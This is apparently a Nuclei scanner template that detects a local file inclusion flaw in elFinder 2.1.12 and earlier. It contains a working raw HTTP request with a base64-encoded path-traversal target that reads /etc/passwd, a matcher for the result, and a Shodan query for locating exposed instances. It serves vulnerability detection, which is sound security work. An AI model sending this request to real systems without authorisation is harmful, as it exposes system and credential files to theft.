id: elFinder-path-traversal info: name: elFinder <=2.1.12 - Local File Inclusion author: ritikchaddha severity: high description: | elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. reference: - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: verified: true max-request: 1 shodan-query: title:"elfinder" tags: lfi,elfinder http: - raw: - | GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a0046304402207a84fa4d505ee01813aeca1abbfd4901a7910ca8abf6e6663cf90a67380b2b560220342914fbdc445692dcbfcaf2ce7f7df1984898f72d3101e9bea46f1c625e6ecc:922c64590222798bb761d5b6d8e72950